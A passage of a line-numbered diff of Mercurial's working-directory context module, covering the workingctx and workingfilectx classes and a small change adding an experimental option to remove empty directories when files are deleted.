1236 for a in self._repo.changelog.ancestors(
1237 [p.rev() for p in self._parents]):
1237 [p.rev() for p in self._parents]):
1238 yield changectx(self._repo, a)
1238 yield changectx(self._repo, a)
1239
1239
1240 def markcommitted(self, node):
1240 def markcommitted(self, node):
1241 """Perform post-commit cleanup necessary after committing this ctx
1241 """Perform post-commit cleanup necessary after committing this ctx
1242
1242
1243 Specifically, this updates backing stores this working context
1243 Specifically, this updates backing stores this working context
1244 wraps to reflect the fact that the changes reflected by this
1244 wraps to reflect the fact that the changes reflected by this
1245 workingctx have been committed. For example, it marks
1245 workingctx have been committed. For example, it marks
1246 modified and added files as normal in the dirstate.
1246 modified and added files as normal in the dirstate.
1247
1247
1248 """
1248 """
1249
1249
1250 with self._repo.dirstate.parentchange():
1250 with self._repo.dirstate.parentchange():
1251 for f in self.modified() + self.added():
1251 for f in self.modified() + self.added():
1252 self._repo.dirstate.normal(f)
1252 self._repo.dirstate.normal(f)
1253 for f in self.removed():
1253 for f in self.removed():
1254 self._repo.dirstate.drop(f)
1254 self._repo.dirstate.drop(f)
1255 self._repo.dirstate.setparents(node)
1255 self._repo.dirstate.setparents(node)
1256
1256
1257 # write changes out explicitly, because nesting wlock at
1257 # write changes out explicitly, because nesting wlock at
1258 # runtime may prevent 'wlock.release()' in 'repo.commit()'
1258 # runtime may prevent 'wlock.release()' in 'repo.commit()'
1259 # from immediately doing so for subsequent changing files
1259 # from immediately doing so for subsequent changing files
1260 self._repo.dirstate.write(self._repo.currenttransaction())
1260 self._repo.dirstate.write(self._repo.currenttransaction())
1261
1261
1262 def dirty(self, missing=False, merge=True, branch=True):
1262 def dirty(self, missing=False, merge=True, branch=True):
1263 return False
1263 return False
1264
1264
1265 class workingctx(committablectx):
1265 class workingctx(committablectx):
1266 """A workingctx object makes access to data related to
1266 """A workingctx object makes access to data related to
1267 the current working directory convenient.
1267 the current working directory convenient.
1268 date - any valid date string or (unixtime, offset), or None.
1268 date - any valid date string or (unixtime, offset), or None.
1269 user - username string, or None.
1269 user - username string, or None.
1270 extra - a dictionary of extra values, or None.
1270 extra - a dictionary of extra values, or None.
1271 changes - a list of file lists as returned by localrepo.status()
1271 changes - a list of file lists as returned by localrepo.status()
1272 or None to use the repository status.
1272 or None to use the repository status.
1273 """
1273 """
1274 def __init__(self, repo, text="", user=None, date=None, extra=None,
1274 def __init__(self, repo, text="", user=None, date=None, extra=None,
1275 changes=None):
1275 changes=None):
1276 super(workingctx, self).__init__(repo, text, user, date, extra, changes)
1276 super(workingctx, self).__init__(repo, text, user, date, extra, changes)
1277
1277
1278 def __iter__(self):
1278 def __iter__(self):
1279 d = self._repo.dirstate
1279 d = self._repo.dirstate
1280 for f in d:
1280 for f in d:
1281 if d[f] != 'r':
1281 if d[f] != 'r':
1282 yield f
1282 yield f
1283
1283
1284 def __contains__(self, key):
1284 def __contains__(self, key):
1285 return self._repo.dirstate[key] not in "?r"
1285 return self._repo.dirstate[key] not in "?r"
1286
1286
1287 def hex(self):
1287 def hex(self):
1288 return hex(wdirid)
1288 return hex(wdirid)
1289
1289
1290 @propertycache
1290 @propertycache
1291 def _parents(self):
1291 def _parents(self):
1292 p = self._repo.dirstate.parents()
1292 p = self._repo.dirstate.parents()
1293 if p[1] == nullid:
1293 if p[1] == nullid:
1294 p = p[:-1]
1294 p = p[:-1]
1295 return [changectx(self._repo, x) for x in p]
1295 return [changectx(self._repo, x) for x in p]
1296
1296
1297 def _fileinfo(self, path):
1297 def _fileinfo(self, path):
1298 # populate __dict__['_manifest'] as workingctx has no _manifestdelta
1298 # populate __dict__['_manifest'] as workingctx has no _manifestdelta
1299 self._manifest
1299 self._manifest
1300 return super(workingctx, self)._fileinfo(path)
1300 return super(workingctx, self)._fileinfo(path)
1301
1301
1302 def filectx(self, path, filelog=None):
1302 def filectx(self, path, filelog=None):
1303 """get a file context from the working directory"""
1303 """get a file context from the working directory"""
1304 return workingfilectx(self._repo, path, workingctx=self,
1304 return workingfilectx(self._repo, path, workingctx=self,
1305 filelog=filelog)
1305 filelog=filelog)
1306
1306
1307 def dirty(self, missing=False, merge=True, branch=True):
1307 def dirty(self, missing=False, merge=True, branch=True):
1308 "check whether a working directory is modified"
1308 "check whether a working directory is modified"
1309 # check subrepos first
1309 # check subrepos first
1310 for s in sorted(self.substate):
1310 for s in sorted(self.substate):
1311 if self.sub(s).dirty(missing=missing):
1311 if self.sub(s).dirty(missing=missing):
1312 return True
1312 return True
1313 # check current working dir
1313 # check current working dir
1314 return ((merge and self.p2()) or
1314 return ((merge and self.p2()) or
1315 (branch and self.branch() != self.p1().branch()) or
1315 (branch and self.branch() != self.p1().branch()) or
1316 self.modified() or self.added() or self.removed() or
1316 self.modified() or self.added() or self.removed() or
1317 (missing and self.deleted()))
1317 (missing and self.deleted()))
1318
1318
1319 def add(self, list, prefix=""):
1319 def add(self, list, prefix=""):
1320 with self._repo.wlock():
1320 with self._repo.wlock():
1321 ui, ds = self._repo.ui, self._repo.dirstate
1321 ui, ds = self._repo.ui, self._repo.dirstate
1322 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1322 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1323 rejected = []
1323 rejected = []
1324 lstat = self._repo.wvfs.lstat
1324 lstat = self._repo.wvfs.lstat
1325 for f in list:
1325 for f in list:
1326 # ds.pathto() returns an absolute file when this is invoked from
1326 # ds.pathto() returns an absolute file when this is invoked from
1327 # the keyword extension. That gets flagged as non-portable on
1327 # the keyword extension. That gets flagged as non-portable on
1328 # Windows, since it contains the drive letter and colon.
1328 # Windows, since it contains the drive letter and colon.
1329 scmutil.checkportable(ui, os.path.join(prefix, f))
1329 scmutil.checkportable(ui, os.path.join(prefix, f))
1330 try:
1330 try:
1331 st = lstat(f)
1331 st = lstat(f)
1332 except OSError:
1332 except OSError:
1333 ui.warn(_("%s does not exist!\n") % uipath(f))
1333 ui.warn(_("%s does not exist!\n") % uipath(f))
1334 rejected.append(f)
1334 rejected.append(f)
1335 continue
1335 continue
1336 if st.st_size > 10000000:
1336 if st.st_size > 10000000:
1337 ui.warn(_("%s: up to %d MB of RAM may be required "
1337 ui.warn(_("%s: up to %d MB of RAM may be required "
1338 "to manage this file\n"
1338 "to manage this file\n"
1339 "(use 'hg revert %s' to cancel the "
1339 "(use 'hg revert %s' to cancel the "
1340 "pending addition)\n")
1340 "pending addition)\n")
1341 % (f, 3 * st.st_size // 1000000, uipath(f)))
1341 % (f, 3 * st.st_size // 1000000, uipath(f)))
1342 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1342 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1343 ui.warn(_("%s not added: only files and symlinks "
1343 ui.warn(_("%s not added: only files and symlinks "
1344 "supported currently\n") % uipath(f))
1344 "supported currently\n") % uipath(f))
1345 rejected.append(f)
1345 rejected.append(f)
1346 elif ds[f] in 'amn':
1346 elif ds[f] in 'amn':
1347 ui.warn(_("%s already tracked!\n") % uipath(f))
1347 ui.warn(_("%s already tracked!\n") % uipath(f))
1348 elif ds[f] == 'r':
1348 elif ds[f] == 'r':
1349 ds.normallookup(f)
1349 ds.normallookup(f)
1350 else:
1350 else:
1351 ds.add(f)
1351 ds.add(f)
1352 return rejected
1352 return rejected
1353
1353
1354 def forget(self, files, prefix=""):
1354 def forget(self, files, prefix=""):
1355 with self._repo.wlock():
1355 with self._repo.wlock():
1356 ds = self._repo.dirstate
1356 ds = self._repo.dirstate
1357 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1357 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1358 rejected = []
1358 rejected = []
1359 for f in files:
1359 for f in files:
1360 if f not in self._repo.dirstate:
1360 if f not in self._repo.dirstate:
1361 self._repo.ui.warn(_("%s not tracked!\n") % uipath(f))
1361 self._repo.ui.warn(_("%s not tracked!\n") % uipath(f))
1362 rejected.append(f)
1362 rejected.append(f)
1363 elif self._repo.dirstate[f] != 'a':
1363 elif self._repo.dirstate[f] != 'a':
1364 self._repo.dirstate.remove(f)
1364 self._repo.dirstate.remove(f)
1365 else:
1365 else:
1366 self._repo.dirstate.drop(f)
1366 self._repo.dirstate.drop(f)
1367 return rejected
1367 return rejected
1368
1368
1369 def undelete(self, list):
1369 def undelete(self, list):
1370 pctxs = self.parents()
1370 pctxs = self.parents()
1371 with self._repo.wlock():
1371 with self._repo.wlock():
1372 ds = self._repo.dirstate
1372 ds = self._repo.dirstate
1373 for f in list:
1373 for f in list:
1374 if self._repo.dirstate[f] != 'r':
1374 if self._repo.dirstate[f] != 'r':
1375 self._repo.ui.warn(_("%s not removed!\n") % ds.pathto(f))
1375 self._repo.ui.warn(_("%s not removed!\n") % ds.pathto(f))
1376 else:
1376 else:
1377 fctx = f in pctxs[0] and pctxs[0][f] or pctxs[1][f]
1377 fctx = f in pctxs[0] and pctxs[0][f] or pctxs[1][f]
1378 t = fctx.data()
1378 t = fctx.data()
1379 self._repo.wwrite(f, t, fctx.flags())
1379 self._repo.wwrite(f, t, fctx.flags())
1380 self._repo.dirstate.normal(f)
1380 self._repo.dirstate.normal(f)
1381
1381
1382 def copy(self, source, dest):
1382 def copy(self, source, dest):
1383 try:
1383 try:
1384 st = self._repo.wvfs.lstat(dest)
1384 st = self._repo.wvfs.lstat(dest)
1385 except OSError as err:
1385 except OSError as err:
1386 if err.errno != errno.ENOENT:
1386 if err.errno != errno.ENOENT:
1387 raise
1387 raise
1388 self._repo.ui.warn(_("%s does not exist!\n")
1388 self._repo.ui.warn(_("%s does not exist!\n")
1389 % self._repo.dirstate.pathto(dest))
1389 % self._repo.dirstate.pathto(dest))
1390 return
1390 return
1391 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1391 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1392 self._repo.ui.warn(_("copy failed: %s is not a file or a "
1392 self._repo.ui.warn(_("copy failed: %s is not a file or a "
1393 "symbolic link\n")
1393 "symbolic link\n")
1394 % self._repo.dirstate.pathto(dest))
1394 % self._repo.dirstate.pathto(dest))
1395 else:
1395 else:
1396 with self._repo.wlock():
1396 with self._repo.wlock():
1397 if self._repo.dirstate[dest] in '?':
1397 if self._repo.dirstate[dest] in '?':
1398 self._repo.dirstate.add(dest)
1398 self._repo.dirstate.add(dest)
1399 elif self._repo.dirstate[dest] in 'r':
1399 elif self._repo.dirstate[dest] in 'r':
1400 self._repo.dirstate.normallookup(dest)
1400 self._repo.dirstate.normallookup(dest)
1401 self._repo.dirstate.copy(source, dest)
1401 self._repo.dirstate.copy(source, dest)
1402
1402
1403 def match(self, pats=None, include=None, exclude=None, default='glob',
1403 def match(self, pats=None, include=None, exclude=None, default='glob',
1404 listsubrepos=False, badfn=None):
1404 listsubrepos=False, badfn=None):
1405 r = self._repo
1405 r = self._repo
1406
1406
1407 # Only a case insensitive filesystem needs magic to translate user input
1407 # Only a case insensitive filesystem needs magic to translate user input
1408 # to actual case in the filesystem.
1408 # to actual case in the filesystem.
1409 icasefs = not util.fscasesensitive(r.root)
1409 icasefs = not util.fscasesensitive(r.root)
1410 return matchmod.match(r.root, r.getcwd(), pats, include, exclude,
1410 return matchmod.match(r.root, r.getcwd(), pats, include, exclude,
1411 default, auditor=r.auditor, ctx=self,
1411 default, auditor=r.auditor, ctx=self,
1412 listsubrepos=listsubrepos, badfn=badfn,
1412 listsubrepos=listsubrepos, badfn=badfn,
1413 icasefs=icasefs)
1413 icasefs=icasefs)
1414
1414
1415 def _filtersuspectsymlink(self, files):
1415 def _filtersuspectsymlink(self, files):
1416 if not files or self._repo.dirstate._checklink:
1416 if not files or self._repo.dirstate._checklink:
1417 return files
1417 return files
1418
1418
1419 # Symlink placeholders may get non-symlink-like contents
1419 # Symlink placeholders may get non-symlink-like contents
1420 # via user error or dereferencing by NFS or Samba servers,
1420 # via user error or dereferencing by NFS or Samba servers,
1421 # so we filter out any placeholders that don't look like a
1421 # so we filter out any placeholders that don't look like a
1422 # symlink
1422 # symlink
1423 sane = []
1423 sane = []
1424 for f in files:
1424 for f in files:
1425 if self.flags(f) == 'l':
1425 if self.flags(f) == 'l':
1426 d = self[f].data()
1426 d = self[f].data()
1427 if (d == '' or len(d) >= 1024 or '\n' in d
1427 if (d == '' or len(d) >= 1024 or '\n' in d
1428 or stringutil.binary(d)):
1428 or stringutil.binary(d)):
1429 self._repo.ui.debug('ignoring suspect symlink placeholder'
1429 self._repo.ui.debug('ignoring suspect symlink placeholder'
1430 ' "%s"\n' % f)
1430 ' "%s"\n' % f)
1431 continue
1431 continue
1432 sane.append(f)
1432 sane.append(f)
1433 return sane
1433 return sane
1434
1434
1435 def _checklookup(self, files):
1435 def _checklookup(self, files):
1436 # check for any possibly clean files
1436 # check for any possibly clean files
1437 if not files:
1437 if not files:
1438 return [], [], []
1438 return [], [], []
1439
1439
1440 modified = []
1440 modified = []
1441 deleted = []
1441 deleted = []
1442 fixup = []
1442 fixup = []
1443 pctx = self._parents[0]
1443 pctx = self._parents[0]
1444 # do a full compare of any files that might have changed
1444 # do a full compare of any files that might have changed
1445 for f in sorted(files):
1445 for f in sorted(files):
1446 try:
1446 try:
1447 # This will return True for a file that got replaced by a
1447 # This will return True for a file that got replaced by a
1448 # directory in the interim, but fixing that is pretty hard.
1448 # directory in the interim, but fixing that is pretty hard.
1449 if (f not in pctx or self.flags(f) != pctx.flags(f)
1449 if (f not in pctx or self.flags(f) != pctx.flags(f)
1450 or pctx[f].cmp(self[f])):
1450 or pctx[f].cmp(self[f])):
1451 modified.append(f)
1451 modified.append(f)
1452 else:
1452 else:
1453 fixup.append(f)
1453 fixup.append(f)
1454 except (IOError, OSError):
1454 except (IOError, OSError):
1455 # A file become inaccessible in between? Mark it as deleted,
1455 # A file become inaccessible in between? Mark it as deleted,
1456 # matching dirstate behavior (issue5584).
1456 # matching dirstate behavior (issue5584).
1457 # The dirstate has more complex behavior around whether a
1457 # The dirstate has more complex behavior around whether a
1458 # missing file matches a directory, etc, but we don't need to
1458 # missing file matches a directory, etc, but we don't need to
1459 # bother with that: if f has made it to this point, we're sure
1459 # bother with that: if f has made it to this point, we're sure
1460 # it's in the dirstate.
1460 # it's in the dirstate.
1461 deleted.append(f)
1461 deleted.append(f)
1462
1462
1463 return modified, deleted, fixup
1463 return modified, deleted, fixup
1464
1464
1465 def _poststatusfixup(self, status, fixup):
1465 def _poststatusfixup(self, status, fixup):
1466 """update dirstate for files that are actually clean"""
1466 """update dirstate for files that are actually clean"""
1467 poststatus = self._repo.postdsstatus()
1467 poststatus = self._repo.postdsstatus()
1468 if fixup or poststatus:
1468 if fixup or poststatus:
1469 try:
1469 try:
1470 oldid = self._repo.dirstate.identity()
1470 oldid = self._repo.dirstate.identity()
1471
1471
1472 # updating the dirstate is optional
1472 # updating the dirstate is optional
1473 # so we don't wait on the lock
1473 # so we don't wait on the lock
1474 # wlock can invalidate the dirstate, so cache normal _after_
1474 # wlock can invalidate the dirstate, so cache normal _after_
1475 # taking the lock
1475 # taking the lock
1476 with self._repo.wlock(False):
1476 with self._repo.wlock(False):
1477 if self._repo.dirstate.identity() == oldid:
1477 if self._repo.dirstate.identity() == oldid:
1478 if fixup:
1478 if fixup:
1479 normal = self._repo.dirstate.normal
1479 normal = self._repo.dirstate.normal
1480 for f in fixup:
1480 for f in fixup:
1481 normal(f)
1481 normal(f)
1482 # write changes out explicitly, because nesting
1482 # write changes out explicitly, because nesting
1483 # wlock at runtime may prevent 'wlock.release()'
1483 # wlock at runtime may prevent 'wlock.release()'
1484 # after this block from doing so for subsequent
1484 # after this block from doing so for subsequent
1485 # changing files
1485 # changing files
1486 tr = self._repo.currenttransaction()
1486 tr = self._repo.currenttransaction()
1487 self._repo.dirstate.write(tr)
1487 self._repo.dirstate.write(tr)
1488
1488
1489 if poststatus:
1489 if poststatus:
1490 for ps in poststatus:
1490 for ps in poststatus:
1491 ps(self, status)
1491 ps(self, status)
1492 else:
1492 else:
1493 # in this case, writing changes out breaks
1493 # in this case, writing changes out breaks
1494 # consistency, because .hg/dirstate was
1494 # consistency, because .hg/dirstate was
1495 # already changed simultaneously after last
1495 # already changed simultaneously after last
1496 # caching (see also issue5584 for detail)
1496 # caching (see also issue5584 for detail)
1497 self._repo.ui.debug('skip updating dirstate: '
1497 self._repo.ui.debug('skip updating dirstate: '
1498 'identity mismatch\n')
1498 'identity mismatch\n')
1499 except error.LockError:
1499 except error.LockError:
1500 pass
1500 pass
1501 finally:
1501 finally:
1502 # Even if the wlock couldn't be grabbed, clear out the list.
1502 # Even if the wlock couldn't be grabbed, clear out the list.
1503 self._repo.clearpostdsstatus()
1503 self._repo.clearpostdsstatus()
1504
1504
1505 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
1505 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
1506 '''Gets the status from the dirstate -- internal use only.'''
1506 '''Gets the status from the dirstate -- internal use only.'''
1507 subrepos = []
1507 subrepos = []
1508 if '.hgsub' in self:
1508 if '.hgsub' in self:
1509 subrepos = sorted(self.substate)
1509 subrepos = sorted(self.substate)
1510 cmp, s = self._repo.dirstate.status(match, subrepos, ignored=ignored,
1510 cmp, s = self._repo.dirstate.status(match, subrepos, ignored=ignored,
1511 clean=clean, unknown=unknown)
1511 clean=clean, unknown=unknown)
1512
1512
1513 # check for any possibly clean files
1513 # check for any possibly clean files
1514 fixup = []
1514 fixup = []
1515 if cmp:
1515 if cmp:
1516 modified2, deleted2, fixup = self._checklookup(cmp)
1516 modified2, deleted2, fixup = self._checklookup(cmp)
1517 s.modified.extend(modified2)
1517 s.modified.extend(modified2)
1518 s.deleted.extend(deleted2)
1518 s.deleted.extend(deleted2)
1519
1519
1520 if fixup and clean:
1520 if fixup and clean:
1521 s.clean.extend(fixup)
1521 s.clean.extend(fixup)
1522
1522
1523 self._poststatusfixup(s, fixup)
1523 self._poststatusfixup(s, fixup)
1524
1524
1525 if match.always():
1525 if match.always():
1526 # cache for performance
1526 # cache for performance
1527 if s.unknown or s.ignored or s.clean:
1527 if s.unknown or s.ignored or s.clean:
1528 # "_status" is cached with list*=False in the normal route
1528 # "_status" is cached with list*=False in the normal route
1529 self._status = scmutil.status(s.modified, s.added, s.removed,
1529 self._status = scmutil.status(s.modified, s.added, s.removed,
1530 s.deleted, [], [], [])
1530 s.deleted, [], [], [])
1531 else:
1531 else:
1532 self._status = s
1532 self._status = s
1533
1533
1534 return s
1534 return s
1535
1535
1536 @propertycache
1536 @propertycache
1537 def _manifest(self):
1537 def _manifest(self):
1538 """generate a manifest corresponding to the values in self._status
1538 """generate a manifest corresponding to the values in self._status
1539
1539
1540 This reuse the file nodeid from parent, but we use special node
1540 This reuse the file nodeid from parent, but we use special node
1541 identifiers for added and modified files. This is used by manifests
1541 identifiers for added and modified files. This is used by manifests
1542 merge to see that files are different and by update logic to avoid
1542 merge to see that files are different and by update logic to avoid
1543 deleting newly added files.
1543 deleting newly added files.
1544 """
1544 """
1545 return self._buildstatusmanifest(self._status)
1545 return self._buildstatusmanifest(self._status)
1546
1546
1547 def _buildstatusmanifest(self, status):
1547 def _buildstatusmanifest(self, status):
1548 """Builds a manifest that includes the given status results."""
1548 """Builds a manifest that includes the given status results."""
1549 parents = self.parents()
1549 parents = self.parents()
1550
1550
1551 man = parents[0].manifest().copy()
1551 man = parents[0].manifest().copy()
1552
1552
1553 ff = self._flagfunc
1553 ff = self._flagfunc
1554 for i, l in ((addednodeid, status.added),
1554 for i, l in ((addednodeid, status.added),
1555 (modifiednodeid, status.modified)):
1555 (modifiednodeid, status.modified)):
1556 for f in l:
1556 for f in l:
1557 man[f] = i
1557 man[f] = i
1558 try:
1558 try:
1559 man.setflag(f, ff(f))
1559 man.setflag(f, ff(f))
1560 except OSError:
1560 except OSError:
1561 pass
1561 pass
1562
1562
1563 for f in status.deleted + status.removed:
1563 for f in status.deleted + status.removed:
1564 if f in man:
1564 if f in man:
1565 del man[f]
1565 del man[f]
1566
1566
1567 return man
1567 return man
1568
1568
1569 def _buildstatus(self, other, s, match, listignored, listclean,
1569 def _buildstatus(self, other, s, match, listignored, listclean,
1570 listunknown):
1570 listunknown):
1571 """build a status with respect to another context
1571 """build a status with respect to another context
1572
1572
1573 This includes logic for maintaining the fast path of status when
1573 This includes logic for maintaining the fast path of status when
1574 comparing the working directory against its parent, which is to skip
1574 comparing the working directory against its parent, which is to skip
1575 building a new manifest if self (working directory) is not comparing
1575 building a new manifest if self (working directory) is not comparing
1576 against its parent (repo['.']).
1576 against its parent (repo['.']).
1577 """
1577 """
1578 s = self._dirstatestatus(match, listignored, listclean, listunknown)
1578 s = self._dirstatestatus(match, listignored, listclean, listunknown)
1579 # Filter out symlinks that, in the case of FAT32 and NTFS filesystems,
1579 # Filter out symlinks that, in the case of FAT32 and NTFS filesystems,
1580 # might have accidentally ended up with the entire contents of the file
1580 # might have accidentally ended up with the entire contents of the file
1581 # they are supposed to be linking to.
1581 # they are supposed to be linking to.
1582 s.modified[:] = self._filtersuspectsymlink(s.modified)
1582 s.modified[:] = self._filtersuspectsymlink(s.modified)
1583 if other != self._repo['.']:
1583 if other != self._repo['.']:
1584 s = super(workingctx, self)._buildstatus(other, s, match,
1584 s = super(workingctx, self)._buildstatus(other, s, match,
1585 listignored, listclean,
1585 listignored, listclean,
1586 listunknown)
1586 listunknown)
1587 return s
1587 return s
1588
1588
1589 def _matchstatus(self, other, match):
1589 def _matchstatus(self, other, match):
1590 """override the match method with a filter for directory patterns
1590 """override the match method with a filter for directory patterns
1591
1591
1592 We use inheritance to customize the match.bad method only in cases of
1592 We use inheritance to customize the match.bad method only in cases of
1593 workingctx since it belongs only to the working directory when
1593 workingctx since it belongs only to the working directory when
1594 comparing against the parent changeset.
1594 comparing against the parent changeset.
1595
1595
1596 If we aren't comparing against the working directory's parent, then we
1596 If we aren't comparing against the working directory's parent, then we
1597 just use the default match object sent to us.
1597 just use the default match object sent to us.
1598 """
1598 """
1599 if other != self._repo['.']:
1599 if other != self._repo['.']:
1600 def bad(f, msg):
1600 def bad(f, msg):
1601 # 'f' may be a directory pattern from 'match.files()',
1601 # 'f' may be a directory pattern from 'match.files()',
1602 # so 'f not in ctx1' is not enough
1602 # so 'f not in ctx1' is not enough
1603 if f not in other and not other.hasdir(f):
1603 if f not in other and not other.hasdir(f):
1604 self._repo.ui.warn('%s: %s\n' %
1604 self._repo.ui.warn('%s: %s\n' %
1605 (self._repo.dirstate.pathto(f), msg))
1605 (self._repo.dirstate.pathto(f), msg))
1606 match.bad = bad
1606 match.bad = bad
1607 return match
1607 return match
1608
1608
1609 def markcommitted(self, node):
1609 def markcommitted(self, node):
1610 super(workingctx, self).markcommitted(node)
1610 super(workingctx, self).markcommitted(node)
1611
1611
1612 sparse.aftercommit(self._repo, node)
1612 sparse.aftercommit(self._repo, node)
1613
1613
1614 class committablefilectx(basefilectx):
1614 class committablefilectx(basefilectx):
1615 """A committablefilectx provides common functionality for a file context
1615 """A committablefilectx provides common functionality for a file context
1616 that wants the ability to commit, e.g. workingfilectx or memfilectx."""
1616 that wants the ability to commit, e.g. workingfilectx or memfilectx."""
1617 def __init__(self, repo, path, filelog=None, ctx=None):
1617 def __init__(self, repo, path, filelog=None, ctx=None):
1618 self._repo = repo
1618 self._repo = repo
1619 self._path = path
1619 self._path = path
1620 self._changeid = None
1620 self._changeid = None
1621 self._filerev = self._filenode = None
1621 self._filerev = self._filenode = None
1622
1622
1623 if filelog is not None:
1623 if filelog is not None:
1624 self._filelog = filelog
1624 self._filelog = filelog
1625 if ctx:
1625 if ctx:
1626 self._changectx = ctx
1626 self._changectx = ctx
1627
1627
1628 def __nonzero__(self):
1628 def __nonzero__(self):
1629 return True
1629 return True
1630
1630
1631 __bool__ = __nonzero__
1631 __bool__ = __nonzero__
1632
1632
1633 def linkrev(self):
1633 def linkrev(self):
1634 # linked to self._changectx no matter if file is modified or not
1634 # linked to self._changectx no matter if file is modified or not
1635 return self.rev()
1635 return self.rev()
1636
1636
1637 def parents(self):
1637 def parents(self):
1638 '''return parent filectxs, following copies if necessary'''
1638 '''return parent filectxs, following copies if necessary'''
1639 def filenode(ctx, path):
1639 def filenode(ctx, path):
1640 return ctx._manifest.get(path, nullid)
1640 return ctx._manifest.get(path, nullid)
1641
1641
1642 path = self._path
1642 path = self._path
1643 fl = self._filelog
1643 fl = self._filelog
1644 pcl = self._changectx._parents
1644 pcl = self._changectx._parents
1645 renamed = self.renamed()
1645 renamed = self.renamed()
1646
1646
1647 if renamed:
1647 if renamed:
1648 pl = [renamed + (None,)]
1648 pl = [renamed + (None,)]
1649 else:
1649 else:
1650 pl = [(path, filenode(pcl[0], path), fl)]
1650 pl = [(path, filenode(pcl[0], path), fl)]
1651
1651
1652 for pc in pcl[1:]:
1652 for pc in pcl[1:]:
1653 pl.append((path, filenode(pc, path), fl))
1653 pl.append((path, filenode(pc, path), fl))
1654
1654
1655 return [self._parentfilectx(p, fileid=n, filelog=l)
1655 return [self._parentfilectx(p, fileid=n, filelog=l)
1656 for p, n, l in pl if n != nullid]
1656 for p, n, l in pl if n != nullid]
1657
1657
1658 def children(self):
1658 def children(self):
1659 return []
1659 return []
1660
1660
1661 class workingfilectx(committablefilectx):
1661 class workingfilectx(committablefilectx):
1662 """A workingfilectx object makes access to data related to a particular
1662 """A workingfilectx object makes access to data related to a particular
1663 file in the working directory convenient."""
1663 file in the working directory convenient."""
1664 def __init__(self, repo, path, filelog=None, workingctx=None):
1664 def __init__(self, repo, path, filelog=None, workingctx=None):
1665 super(workingfilectx, self).__init__(repo, path, filelog, workingctx)
1665 super(workingfilectx, self).__init__(repo, path, filelog, workingctx)
1666
1666
1667 @propertycache
1667 @propertycache
1668 def _changectx(self):
1668 def _changectx(self):
1669 return workingctx(self._repo)
1669 return workingctx(self._repo)
1670
1670
1671 def data(self):
1671 def data(self):
1672 return self._repo.wread(self._path)
1672 return self._repo.wread(self._path)
1673 def renamed(self):
1673 def renamed(self):
1674 rp = self._repo.dirstate.copied(self._path)
1674 rp = self._repo.dirstate.copied(self._path)
1675 if not rp:
1675 if not rp:
1676 return None
1676 return None
1677 return rp, self._changectx._parents[0]._manifest.get(rp, nullid)
1677 return rp, self._changectx._parents[0]._manifest.get(rp, nullid)
1678
1678
1679 def size(self):
1679 def size(self):
1680 return self._repo.wvfs.lstat(self._path).st_size
1680 return self._repo.wvfs.lstat(self._path).st_size
1681 def date(self):
1681 def date(self):
1682 t, tz = self._changectx.date()
1682 t, tz = self._changectx.date()
1683 try:
1683 try:
1684 return (self._repo.wvfs.lstat(self._path)[stat.ST_MTIME], tz)
1684 return (self._repo.wvfs.lstat(self._path)[stat.ST_MTIME], tz)
1685 except OSError as err:
1685 except OSError as err:
1686 if err.errno != errno.ENOENT:
1686 if err.errno != errno.ENOENT:
1687 raise
1687 raise
1688 return (t, tz)
1688 return (t, tz)
1689
1689
1690 def exists(self):
1690 def exists(self):
1691 return self._repo.wvfs.exists(self._path)
1691 return self._repo.wvfs.exists(self._path)
1692
1692
1693 def lexists(self):
1693 def lexists(self):
1694 return self._repo.wvfs.lexists(self._path)
1694 return self._repo.wvfs.lexists(self._path)
1695
1695
1696 def audit(self):
1696 def audit(self):
1697 return self._repo.wvfs.audit(self._path)
1697 return self._repo.wvfs.audit(self._path)
1698
1698
1699 def cmp(self, fctx):
1699 def cmp(self, fctx):
1700 """compare with other file context
1700 """compare with other file context
1701
1701
1702 returns True if different than fctx.
1702 returns True if different than fctx.
1703 """
1703 """
1704 # fctx should be a filectx (not a workingfilectx)
1704 # fctx should be a filectx (not a workingfilectx)
1705 # invert comparison to reuse the same code path
1705 # invert comparison to reuse the same code path
1706 return fctx.cmp(self)
1706 return fctx.cmp(self)
1707
1707
1708 def remove(self, ignoremissing=False):
1708 def remove(self, ignoremissing=False):
1709 """wraps unlink for a repo's working directory"""
1709 """wraps unlink for a repo's working directory"""
1710 self._repo.wvfs.unlinkpath(self._path, ignoremissing=ignoremissing)
1710 rmdir = self._repo.ui.configbool('experimental', 'removeemptydirs')
1711 self._repo.wvfs.unlinkpath(self._path, ignoremissing=ignoremissing,
1712 rmdir=rmdir)
1711
1713
1712 def write(self, data, flags, backgroundclose=False, **kwargs):
1714 def write(self, data, flags, backgroundclose=False, **kwargs):
1713 """wraps repo.wwrite"""
1715 """wraps repo.wwrite"""
1714 self._repo.wwrite(self._path, data, flags,
1716 self._repo.wwrite(self._path, data, flags,
1715 backgroundclose=backgroundclose,
1717 backgroundclose=backgroundclose,
1716 **kwargs)
1718 **kwargs)
1717
1719
1718 def markcopied(self, src):
1720 def markcopied(self, src):
1719 """marks this file a copy of `src`"""
1721 """marks this file a copy of `src`"""
1720 if self._repo.dirstate[self._path] in "nma":
1722 if self._repo.dirstate[self._path] in "nma":
1721 self._repo.dirstate.copy(src, self._path)
1723 self._repo.dirstate.copy(src, self._path)
1722
1724
1723 def clearunknown(self):
1725 def clearunknown(self):
1724 """Removes conflicting items in the working directory so that
1726 """Removes conflicting items in the working directory so that
1725 ``write()`` can be called successfully.
1727 ``write()`` can be called successfully.
1726 """
1728 """
1727 wvfs = self._repo.wvfs
1729 wvfs = self._repo.wvfs
1728 f = self._path
1730 f = self._path
1729 wvfs.audit(f)
1731 wvfs.audit(f)
1730 if wvfs.isdir(f) and not wvfs.islink(f):
1732 if wvfs.isdir(f) and not wvfs.islink(f):
1731 wvfs.rmtree(f, forcibly=True)
1733 wvfs.rmtree(f, forcibly=True)
1732 if self._repo.ui.configbool('experimental', 'merge.checkpathconflicts'):
1734 if self._repo.ui.configbool('experimental', 'merge.checkpathconflicts'):
1733 for p in reversed(list(util.finddirs(f))):
